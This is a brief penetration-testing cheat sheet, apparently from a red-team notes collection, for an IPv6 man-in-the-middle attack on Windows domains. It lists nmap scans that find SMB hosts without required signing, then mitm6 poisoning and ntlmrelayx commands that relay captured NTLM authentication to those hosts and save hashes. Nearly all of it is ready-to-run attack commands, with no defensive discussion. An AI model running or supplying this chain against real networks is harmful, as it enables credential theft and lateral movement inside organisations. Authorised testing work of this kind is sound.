IPV6 With MITM6
First create a target list of hosts with SMB open:
nmap -p445 -sS -iL live_ips.txt -oA 445_scan
cat 445_scan.gnmap | grep open | cut -d' ' -f2 > open_445.txt
Then find hosts with SMB signing disabled or not required:
nmap -n --script smb-security-mode.nse -p445 -iL open_445.txt -oA smb_script
sed -nE '/^Nmap/h;/disabled|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt
nmap -n --script smb2-security-mode.nse -p445 -iL open_445.txt -oA smb_script
sed -nE '/^Nmap/h;/not required|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt
Finally relay poisoned sessions to the target list:
mitm6 -d domain.com -hb HVAC
ntlmrelayx.py -tf smb_disabled.txt -socks -smb2support -6 -wh whitelist.domain.com -of hashes2